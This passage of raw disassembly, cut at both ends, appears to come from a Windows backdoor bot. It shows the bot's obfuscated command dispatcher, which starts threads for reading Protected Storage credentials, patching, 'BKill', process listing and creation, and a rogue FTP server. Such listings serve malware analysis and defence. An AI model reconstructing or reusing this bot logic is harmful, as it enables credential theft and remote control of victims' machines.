loc_404893: ; CODE XREF: sub_403B2C+D3B�j
; sub_403B2C+D49�j
push dword ptr [esi]
push offset aM5spx_qp7lx_ ; "M5sPX.Qp7Lx."
call ebx ; dword_42F070
test eax, eax
jnz loc_404AAD
push 0Fh
call sub_41C254
xor ebx, ebx
pop ecx
cmp eax, ebx
mov [ebp+arg_C], eax
jle short loc_4048F3
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
jnz short loc_4048E1
cmp [ebp+arg_18], 0
jnz short loc_4048EB
push eax
push offset aPstore ; "PStore"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_4048E1: ; CODE XREF: sub_403B2C+D97�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4048EB: ; CODE XREF: sub_403B2C+D9D�j
push [ebp+arg_C]
jmp loc_404AA3
; ---------------------------------------------------------------------------
loc_4048F3: ; CODE XREF: sub_403B2C+D87�j
cmp [ebp+arg_2C], ebx
jz short loc_4048FF
mov eax, [esi+8]
cmp eax, ebx
jnz short loc_404906
loc_4048FF: ; CODE XREF: sub_403B2C+DCA�j
push offset dword_43964C
jmp short loc_404907
; ---------------------------------------------------------------------------
loc_404906: ; CODE XREF: sub_403B2C+DD1�j
push eax
loc_404907: ; CODE XREF: sub_403B2C+DD8�j
lea eax, [ebp+var_1984]
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_18CC], ebx
mov [ebp+var_1988], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18D4], eax
mov eax, [ebp+arg_18]
mov [ebp+var_18D0], eax
mov eax, [ebp+arg_20]
mov [ebp+var_18D8], eax
mov eax, [esi+4]
cmp eax, ebx
jz short loc_404961
push offset asc_435B04 ; "*"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_404961
mov eax, [esi+4]
mov [ebp+var_1900], eax
jmp short loc_404967
; ---------------------------------------------------------------------------
loc_404961: ; CODE XREF: sub_403B2C+E17�j
; sub_403B2C+E28�j
mov [ebp+var_1900], ebx
loc_404967: ; CODE XREF: sub_403B2C+E33�j
mov ebx, offset aIazcn0rzRw0xfk ; "iaZcN0Rz/rw0xfK1r.VuQwI."
push ebx
push offset aSPstore ; "%s PStore"
push 0Fh
call sub_41BED7
add esp, 0Ch
mov [ebp+var_1904], eax
lea eax, [ebp+arg_6C]
lea ecx, [ebp+var_1988]
push eax
xor eax, eax
push eax
push ecx
push offset sub_415DBD
push eax
push eax
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_1904]
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
imul ecx, 1018h
test eax, eax
mov dword_46D414[ecx], eax
jnz loc_404A49
cmp [ebp+arg_14], eax
jnz short loc_4049E2
cmp [ebp+arg_18], eax
jnz short loc_4049E8
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aPstore ; "PStore"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_4049E2: ; CODE XREF: sub_403B2C+E93�j
cmp [ebp+arg_18], 0
jz short loc_404A03
loc_4049E8: ; CODE XREF: sub_403B2C+E98�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aPstore ; "PStore"
push ebx
push esi
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 18h
loc_404A03: ; CODE XREF: sub_403B2C+EBA�j
; sub_403B2C+F26�j
push 1F40h
call dword_42F15C ; Sleep
lea eax, [ebp+arg_6C]
lea ecx, [ebp+var_1988]
push eax
xor eax, eax
push eax
push ecx
push offset sub_416B4C
push eax
push eax
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_1904]
imul ecx, 1018h
test eax, eax
mov dword_46D414[ecx], eax
jz short loc_404A6A
jmp short loc_404A5C
; ---------------------------------------------------------------------------
loc_404A41: ; CODE XREF: sub_403B2C+F24�j
push 32h
call dword_42F15C ; Sleep
loc_404A49: ; CODE XREF: sub_403B2C+E8A�j
cmp [ebp+var_18CC], 0
jz short loc_404A41
jmp short loc_404A03
; ---------------------------------------------------------------------------
loc_404A54: ; CODE XREF: sub_403B2C+F37�j
push 32h
call dword_42F15C ; Sleep
loc_404A5C: ; CODE XREF: sub_403B2C+F13�j
cmp [ebp+var_18CC], 0
jz short loc_404A54
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_404A6A: ; CODE XREF: sub_403B2C+F11�j
cmp [ebp+arg_14], 0
jnz short loc_404A92
cmp [ebp+arg_18], 0
jnz short loc_404A9C
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aPstore ; "PStore"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_404A92: ; CODE XREF: sub_403B2C+F42�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_404A9C: ; CODE XREF: sub_403B2C+F48�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
loc_404AA3: ; CODE XREF: sub_403B2C+DC2�j
push offset aPstore ; "PStore"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_404AAD: ; CODE XREF: sub_403B2C+D72�j
push dword ptr [esi]
push offset aF9ax112067l1 ; "f9aX112067l1"
call ebx ; dword_42F070
test eax, eax
jnz loc_404C28
xor ebx, ebx
cmp [ebp+arg_2C], ebx
jnz loc_404B7B
cmp [esi+4], ebx
jz loc_408AB4
cmp [esi+8], ebx
jz loc_408AB4
cmp [esi+0Ch], ebx
jz loc_408AB4
lea eax, [ebp+var_5B18]
push offset dword_43964C
push eax
call dword_42F04C ; lstrcpyA
push dword ptr [esi+4]
call sub_41A292
push dword ptr [esi+0Ch]
mov [ebp+arg_C], eax
lea eax, [ebp+var_43E4]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 10h
push 4
pop edi
cmp [ebp+arg_4], edi
jle short loc_404B5A
loc_404B20: ; CODE XREF: sub_403B2C+102C�j
mov eax, [esi+edi*4]
cmp eax, ebx
jz short loc_404B54
push eax
lea eax, [ebp+var_18CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_18CAC]
push 104h
push eax
lea eax, [ebp+var_43E4]
push eax
call sub_421F40
add esp, 18h
loc_404B54: ; CODE XREF: sub_403B2C+FF9�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_404B20
loc_404B5A: ; CODE XREF: sub_403B2C+FF2�j
push dword ptr [esi+8]
lea eax, [ebp+var_43E4]
push eax
lea eax, [ebp+var_5B18]
push [ebp+arg_C]
loc_404B6D: ; CODE XREF: sub_403B2C+10F7�j
push [ebp+arg_10]
push eax
call sub_4177A2
jmp loc_40A5CD
; ---------------------------------------------------------------------------
loc_404B7B: ; CODE XREF: sub_403B2C+F97�j
mov eax, [esi+4]
cmp eax, ebx
jz loc_408AB4
cmp [esi+8], ebx
jz loc_408AB4
cmp [esi+0Ch], ebx
jz loc_408AB4
cmp [esi+10h], ebx
jz loc_408AB4
push eax
lea eax, [ebp+var_54D8]
push eax
call dword_42F04C ; lstrcpyA
push dword ptr [esi+8]
call sub_41A292
push dword ptr [esi+10h]
mov ebx, eax
lea eax, [ebp+var_41E0]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 10h
push 5
pop edi
cmp [ebp+arg_4], edi
jle short loc_404C12
loc_404BD8: ; CODE XREF: sub_403B2C+10E4�j
mov eax, [esi+edi*4]
test eax, eax
jz short loc_404C0C
push eax
lea eax, [ebp+var_10CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_10CAC]
push 104h
push eax
lea eax, [ebp+var_41E0]
push eax
call sub_421F40
add esp, 18h
loc_404C0C: ; CODE XREF: sub_403B2C+10B1�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_404BD8
loc_404C12: ; CODE XREF: sub_403B2C+10AA�j
push dword ptr [esi+0Ch]
lea eax, [ebp+var_41E0]
push eax
push ebx
lea eax, [ebp+var_54D8]
jmp loc_404B6D
; ---------------------------------------------------------------------------
loc_404C28: ; CODE XREF: sub_403B2C+F8C�j
push dword ptr [esi]
push offset a1ylid_ejqp01 ; "1YLId.eJQP01"
call ebx ; dword_42F070
test eax, eax
jnz loc_404D23
mov eax, [ebp+arg_14]
push offset dword_439644
mov [ebp+var_3AC], eax
mov eax, [ebp+arg_18]
mov [ebp+var_3A8], eax
mov eax, [ebp+arg_20]
mov [ebp+var_3A4], eax
mov eax, [ebp+arg_10]
mov [ebp+var_434], eax
lea eax, [ebp+var_430]
push eax
call dword_42F04C ; lstrcpyA
push offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
push offset aSPatcherThread ; "%s Patcher thread."
push 4
call sub_41BED7
add esp, 0Ch
xor esi, esi
mov [ebp+var_3B0], eax
lea eax, [ebp+var_434]
push esi
push esi
push eax
push offset sub_41FE93
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_3B0]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_404D0C
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
mov ebx, offset a68gmpWcesMnsrm ; "68gmp/wceS//Mnsrm1FhS.k."
jnz short loc_404CE9
cmp [ebp+arg_18], 0
jnz short loc_404CF3
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aPatcher ; "Patcher"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_404CE9: ; CODE XREF: sub_403B2C+1199�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_404CF3: ; CODE XREF: sub_403B2C+119F�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aPatcher ; "Patcher"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_404D04: ; CODE XREF: sub_403B2C+11E6�j
push 32h
call dword_42F15C ; Sleep
loc_404D0C: ; CODE XREF: sub_403B2C+1189�j
cmp [ebp+var_3A0], esi
jz short loc_404D04
mov ebx, offset a68gmpWcesMnsrm ; "68gmp/wceS//Mnsrm1FhS.k."
mov esi, offset aSPatcherStarte ; "%s Patcher Started"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_404D23: ; CODE XREF: sub_403B2C+1107�j
push dword ptr [esi]
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
call ebx ; dword_42F070
test eax, eax
jnz loc_404EB6
push 0Dh
call sub_41C254
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_404D81
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset a8niowW5nrt1 ; "8nIOw/w5nRT1"
jnz short loc_404D6F
cmp [ebp+arg_18], 0
jnz short loc_404D79
push eax
push offset dword_435C14
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_404D6F: ; CODE XREF: sub_403B2C+1225�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_404D79: ; CODE XREF: sub_403B2C+122B�j
push [ebp+arg_C]
jmp loc_404E58
; ---------------------------------------------------------------------------
loc_404D81: ; CODE XREF: sub_403B2C+1215�j
mov eax, [ebp+arg_14]
mov [ebp+var_33E0], eax
mov eax, [ebp+arg_20]
mov [ebp+var_33E4], eax
push dword ptr [edi+0Ch]
lea eax, [ebp+var_3490]
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_3494], eax
mov esi, [esi+4]
test esi, esi
jz short loc_404DBC
push esi
call sub_422B5A
pop ecx
jmp short loc_404DC3
; ---------------------------------------------------------------------------
loc_404DBC: ; CODE XREF: sub_403B2C+1285�j
movzx eax, word_439012
loc_404DC3: ; CODE XREF: sub_403B2C+128E�j
mov esi, offset dword_4552D0
push eax
mov ebx, offset a8niowW5nrt1 ; "8nIOw/w5nRT1"
push esi
push ebx
push offset aSRunningOnSI ; "%s Running on: [%s:%i]"
push 0Dh
mov [ebp+var_33F4], eax
call sub_41BED7
add esp, 14h
mov [ebp+var_3410], eax
lea eax, [ebp+arg_6C]
lea ecx, [ebp+var_3494]
push eax
xor eax, eax
push eax
push ecx
push offset sub_41EE55
push eax
push eax
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_3410]
imul ecx, 1018h
test eax, eax
mov dword_46D414[ecx], eax
jnz short loc_404E6A
cmp [ebp+arg_14], eax
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
jnz short loc_404E47
cmp [ebp+arg_18], eax
jnz short loc_404E51
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset dword_435C14
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_404E47: ; CODE XREF: sub_403B2C+12F8�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_404E51: ; CODE XREF: sub_403B2C+12FD�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
loc_404E58: ; CODE XREF: sub_403B2C+1250�j
push offset dword_435C14
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_404E62: ; CODE XREF: sub_403B2C+1345�j
push 32h
call dword_42F15C ; Sleep
loc_404E6A: ; CODE XREF: sub_403B2C+12EE�j
cmp [ebp+var_33D8], 0
jz short loc_404E62
cmp [ebp+arg_14], 0
jnz short loc_404E9A
cmp [ebp+arg_18], 0
jnz short loc_404EA4
push [ebp+var_33F4]
push esi
push ebx
push offset aSRunningOnSI ; "%s Running on: [%s:%i]"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_404E9A: ; CODE XREF: sub_403B2C+134B�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_404EA4: ; CODE XREF: sub_403B2C+1351�j
push [ebp+var_33F4]
push esi
push ebx
push offset aSRunningOnSI ; "%s Running on: [%s:%i]"
jmp loc_40AF47
; ---------------------------------------------------------------------------
loc_404EB6: ; CODE XREF: sub_403B2C+1202�j
push dword ptr [esi]
push offset a_swwg1hqeii1 ; ".SWwg1hqeiI1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_404ECF
push offset dword_435C14
push 0Dh
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_404ECF: ; CODE XREF: sub_403B2C+1395�j
push dword ptr [esi]
push offset aS3dyJzo6r ; "s3dY//JZo6r/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_404F3D
cmp [ebp+arg_18], eax
jnz short loc_404F0A
cmp [ebp+arg_20], eax
mov eax, offset a_BuiltJun10200 ; ". Built: Jun 10 2008."
jnz short loc_404EF0
mov eax, offset byte_44D6A4
loc_404EF0: ; CODE XREF: sub_403B2C+13BD�j
push eax
push (offset loc_439027+1)
push (offset loc_439043+1)
push offset aH08_Drzwx_ ; "h/08./drzWX."
push offset aSSSS ; "%s %s (%s) %s"
jmp loc_408818
; ---------------------------------------------------------------------------
loc_404F0A: ; CODE XREF: sub_403B2C+13B3�j
cmp [ebp+arg_20], eax
mov eax, offset a_BuiltJun10200 ; ". Built: Jun 10 2008."
jnz short loc_404F19
mov eax, offset byte_44D6A4
loc_404F19: ; CODE XREF: sub_403B2C+13E6�j
push eax
push (offset loc_439027+1)
push (offset loc_439043+1)
push offset aH08_Drzwx_ ; "h/08./drzWX."
push offset aSSSS ; "%s %s (%s) %s"
loc_404F2E: ; CODE XREF: sub_403B2C+1966�j
; sub_403B2C+49AE�j ...
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
jmp loc_408823
; ---------------------------------------------------------------------------
loc_404F3D: ; CODE XREF: sub_403B2C+13AE�j
push dword ptr [esi]
push offset aPnb_aBfzu60 ; "pNb.a/Bfzu60"
call ebx ; dword_42F070
test eax, eax
jnz short loc_404FAF
xor ebx, ebx
push 1
push ebx
call dword_42F164 ; GetTickCount
push eax
call sub_418A1B
push eax
push offset aH08_Drzwx_ ; "h/08./drzWX."
lea eax, [ebp+var_14CAC]
push offset aSUptimeS ; "%s UPTime: (%s)"
push eax
call sub_422063
add esp, 1Ch
cmp [ebp+arg_14], ebx
mov esi, offset aS_1 ; "%s"
jnz short loc_404F9A
cmp [ebp+arg_18], ebx
jnz short loc_404FA3
lea eax, [ebp+var_14CAC]
push eax
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_404F9A: ; CODE XREF: sub_403B2C+1451�j
cmp [ebp+arg_18], ebx
jz loc_40AF54
loc_404FA3: ; CODE XREF: sub_403B2C+1456�j
lea eax, [ebp+var_14CAC]
push eax
jmp loc_40ADA0
; ---------------------------------------------------------------------------
loc_404FAF: ; CODE XREF: sub_403B2C+141C�j
push dword ptr [esi]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call ebx ; dword_42F070
test eax, eax
jz loc_40ADB3
push dword ptr [esi]
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
call ebx ; dword_42F070
test eax, eax
jz loc_40ADB3
push dword ptr [esi]
push offset a47ff020f_0_ ; "47Ff/020f.0."
call ebx ; dword_42F070
test eax, eax
jnz loc_4050F7
mov eax, [ebp+arg_10]
push offset dword_439644
mov [ebp+var_4D0], eax
mov eax, [ebp+arg_14]
mov [ebp+var_444], eax
mov eax, [ebp+arg_18]
mov [ebp+var_440], eax
mov eax, [ebp+arg_20]
mov [ebp+var_43C], eax
lea eax, [ebp+var_4CC]
push eax
call dword_42F04C ; lstrcpyA
mov ebx, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
push ebx
push offset aSBkillThread_ ; "%s BKill thread."
push 10h
call sub_41BED7
add esp, 0Ch
cmp [ebp+arg_14], 0
mov [ebp+var_44C], eax
mov esi, offset aSBkillStarted ; "%s BKill Started"
jnz short loc_405054
cmp [ebp+arg_18], 0
jnz short loc_40505A
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_405054: ; CODE XREF: sub_403B2C+1510�j
cmp [ebp+arg_18], 0
jz short loc_405069
loc_40505A: ; CODE XREF: sub_403B2C+1516�j
push ebx
push esi
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 10h
loc_405069: ; CODE XREF: sub_403B2C+152C�j
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_4D0]
push esi
push eax
push offset sub_417A90
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_44C]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_4050EA
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
jnz short loc_4050C7
cmp [ebp+arg_18], 0
jnz short loc_4050D1
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aBkill ; "BKill"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_4050C7: ; CODE XREF: sub_403B2C+1577�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4050D1: ; CODE XREF: sub_403B2C+157D�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aBkill ; "BKill"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_4050E2: ; CODE XREF: sub_403B2C+15C4�j
push 32h
call dword_42F15C ; Sleep
loc_4050EA: ; CODE XREF: sub_403B2C+156C�j
cmp [ebp+var_438], esi
jz short loc_4050E2
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4050F7: ; CODE XREF: sub_403B2C+14B0�j
push dword ptr [esi]
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
call ebx ; dword_42F070
test eax, eax
jnz loc_4053FB
xor ecx, ecx
cmp [esi+4], ecx
jnz short loc_40511E
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
jmp loc_40AD5F
; ---------------------------------------------------------------------------
loc_40511E: ; CODE XREF: sub_403B2C+15E1�j
mov eax, [ebp+arg_14]
mov edx, [ebp+arg_20]
mov [ebp+var_66C], eax
mov eax, [ebp+arg_18]
mov [ebp+var_668], eax
cmp eax, ecx
mov [ebp+var_670], edx
lea eax, [ebp+var_71C]
jnz short loc_405148
push dword ptr [edi+0Ch]
jmp short loc_40514A
; ---------------------------------------------------------------------------
loc_405148: ; CODE XREF: sub_403B2C+1615�j
push dword ptr [edi]
loc_40514A: ; CODE XREF: sub_403B2C+161A�j
push eax
call dword_42F04C ; lstrcpyA
xor eax, eax
mov [ebp+var_68C], eax
mov [ebp+var_688], eax
mov [ebp+var_684], eax
mov eax, [ebp+arg_10]
mov [ebp+var_720], eax
push dword ptr [esi+4]
push offset aPlsymAee6v1_0 ; "PlsYM/aEe6v1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4051D2
xor ebx, ebx
inc ebx
push ebx
call sub_41C254
test eax, eax
pop ecx
jle short loc_4051C1
cmp [ebp+arg_18], 0
push eax
push offset aProcs ; "Procs"
push offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
push offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
jnz short loc_4051AD
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
jmp short loc_4051B7
; ---------------------------------------------------------------------------
loc_4051AD: ; CODE XREF: sub_403B2C+1672�j
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
loc_4051B7: ; CODE XREF: sub_403B2C+167F�j
add esp, 18h
mov eax, ebx
jmp loc_40AF57
; ---------------------------------------------------------------------------
loc_4051C1: ; CODE XREF: sub_403B2C+165C�j
mov [ebp+var_68C], ebx
mov esi, [esi+8]
mov [ebp+var_694], esi
jmp short loc_40523A
; ---------------------------------------------------------------------------
loc_4051D2: ; CODE XREF: sub_403B2C+164E�j
push dword ptr [esi+4]
push offset aCwxyh0ryouv1 ; "CwXYh0RYoUv1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_4051FD
mov esi, [esi+8]
cmp esi, eax
jnz short loc_4051F1
mov ebx, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
jmp loc_409FCE
; ---------------------------------------------------------------------------
loc_4051F1: ; CODE XREF: sub_403B2C+16B9�j
mov [ebp+var_688], 1
jmp short loc_40522E
; ---------------------------------------------------------------------------
loc_4051FD: ; CODE XREF: sub_403B2C+16B2�j
push dword ptr [esi+4]
push offset aEavyh_ic0dc0 ; "eAvYh.IC0dc0"
call ebx ; dword_42F070
test eax, eax
jnz loc_4052AC
mov esi, [esi+8]
test esi, esi
jnz short loc_405225
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_405225: ; CODE XREF: sub_403B2C+16E8�j
xor eax, eax
inc eax
mov [ebp+var_688], eax
loc_40522E: ; CODE XREF: sub_403B2C+16CF�j
mov [ebp+var_698], esi
mov [ebp+var_684], eax
loc_40523A: ; CODE XREF: sub_403B2C+16A4�j
mov ebx, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
push ebx
push offset aSProcs ; "%s Procs"
push 1
call sub_41BED7
add esp, 0Ch
mov [ebp+var_69C], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_720]
push esi
push eax
push offset sub_418010
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_69C]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz loc_4053B3
cmp [ebp+var_664], esi
jnz loc_40AF54
loc_405296: ; CODE XREF: sub_403B2C+1779�j
push 32h
call dword_42F15C ; Sleep
cmp [ebp+var_664], 0
jz short loc_405296
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4052AC: ; CODE XREF: sub_403B2C+16DD�j
push dword ptr [esi+4]
push offset aUz3rf_vtkug1 ; "uz3rf.VTKug1"
call ebx ; dword_42F070
test eax, eax
jnz loc_40AF54
cmp [esi+8], eax
jnz short loc_4052CD
mov ebx, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
jmp loc_40AD75
; ---------------------------------------------------------------------------
loc_4052CD: ; CODE XREF: sub_403B2C+1795�j
xor ecx, ecx
inc ecx
cmp [esi+0Ch], eax
jz short loc_4052DB
mov [ebp+var_68C], ecx
loc_4052DB: ; CODE XREF: sub_403B2C+17A7�j
cmp [ebp+arg_38], eax
jz short loc_4052E6
mov [ebp+var_688], ecx
loc_4052E6: ; CODE XREF: sub_403B2C+17B2�j
push dword ptr [esi+8]
lea eax, [ebp+var_5198]
push eax
call sub_422063
xor esi, esi
pop ecx
cmp [ebp+arg_30], esi
pop ecx
jz short loc_405339
cmp [ebp+arg_34], 0
mov bl, 5Fh
jz short loc_405309
mov bl, [ebp+arg_34]
loc_405309: ; CODE XREF: sub_403B2C+17D8�j
push [ebp+var_698]
call sub_422120
test eax, eax
pop ecx
jbe short loc_405339
loc_405319: ; CODE XREF: sub_403B2C+180B�j
mov eax, [ebp+var_698]
add eax, esi
cmp [eax], bl
jnz short loc_405328
mov byte ptr [eax], 20h
loc_405328: ; CODE XREF: sub_403B2C+17F7�j
push [ebp+var_698]
inc esi
call sub_422120
cmp esi, eax
pop ecx
jb short loc_405319
loc_405339: ; CODE XREF: sub_403B2C+17D0�j
; sub_403B2C+17EB�j
mov ebx, offset aIi290eb6g4Ty84 ; "II/290Eb6G4/TY84s/myQpz0"
lea eax, [ebp+var_5198]
push ebx
push offset aSCreateProcess ; "%s Create process thread."
push 1
mov [ebp+var_698], eax
call sub_41BED7
add esp, 0Ch
mov [ebp+var_69C], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_720]
push esi
push eax
push offset sub_417CD7
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_69C]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz short loc_4053B3
cmp [ebp+var_664], esi
jnz loc_40AF54
loc_40539D: ; CODE XREF: sub_403B2C+1880�j
push 32h
call dword_42F15C ; Sleep
cmp [ebp+var_664], 0
jz short loc_40539D
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4053B3: ; CODE XREF: sub_403B2C+1758�j
; sub_403B2C+1863�j
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
jnz short loc_4053E0
cmp [ebp+arg_18], 0
jnz short loc_4053EA
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aProcs ; "Procs"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_4053E0: ; CODE XREF: sub_403B2C+1890�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4053EA: ; CODE XREF: sub_403B2C+1896�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aProcs ; "Procs"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_4053FB: ; CODE XREF: sub_403B2C+15D6�j
push dword ptr [esi]
push offset aI3ncg_v5u4g_ ; "I3nCG.v5U4g."
call ebx ; dword_42F070
test eax, eax
jnz short loc_405422
mov ecx, [ebp+arg_10]
push 5
push 7
call sub_410806
mov ecx, [ebp+arg_10]
push eax
call sub_4110F4
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_405422: ; CODE XREF: sub_403B2C+18DA�j
push dword ptr [esi]
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
call ebx ; dword_42F070
test eax, eax
jnz loc_405628
push 9
call sub_41C254
xor ebx, ebx
pop ecx
cmp eax, ebx
mov [ebp+arg_C], eax
jle short loc_405497
cmp [ebp+arg_14], ebx
mov esi, offset aPnmnw_7rscg0 ; "PnmNw.7RScG0"
jnz short loc_405474
cmp [ebp+arg_18], ebx
jnz short loc_40547D
push dword_455398
push eax
push dword_44D680
push esi
push offset aSEftpdRunningO ; "%s EFTPD running on port: %i, thread nu"...
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_405474: ; CODE XREF: sub_403B2C+1920�j
cmp [ebp+arg_18], ebx
jz loc_40AF54
loc_40547D: ; CODE XREF: sub_403B2C+1925�j
push dword_455398
push [ebp+arg_C]
push dword_44D680
push esi
push offset aSEftpdRunningO ; "%s EFTPD running on port: %i, thread nu"...
jmp loc_404F2E
; ---------------------------------------------------------------------------
loc_405497: ; CODE XREF: sub_403B2C+1916�j
cmp dword_455600, ebx
jnz short loc_4054BA
call sub_4220FC
cdq
mov ecx, 12CCh
idiv ecx
add edx, 400h
mov dword_4540A4, edx
jmp short loc_4054C6
; ---------------------------------------------------------------------------
loc_4054BA: ; CODE XREF: sub_403B2C+1971�j
movzx eax, word_439010
mov dword_4540A4, eax
loc_4054C6: ; CODE XREF: sub_403B2C+198C�j
mov esi, offset dword_453E94
push 104h
push esi
push ebx
mov dword_4540A0, ebx
call dword_42F154 ; GetModuleFileNameA
push 103h
push offset loc_439030
push offset dword_453F98
call sub_4222F0
push 7Fh
push offset dword_439638
push offset dword_4540A8
mov dword_454134, ebx
call sub_4222F0
mov eax, [ebp+arg_14]
push esi
push dword_4540A4
mov dword_45412C, eax
mov eax, [ebp+arg_20]
mov esi, offset aPnmnw_7rscg0 ; "PnmNw.7RScG0"
mov dword_454130, eax
mov eax, [ebp+arg_10]
push esi
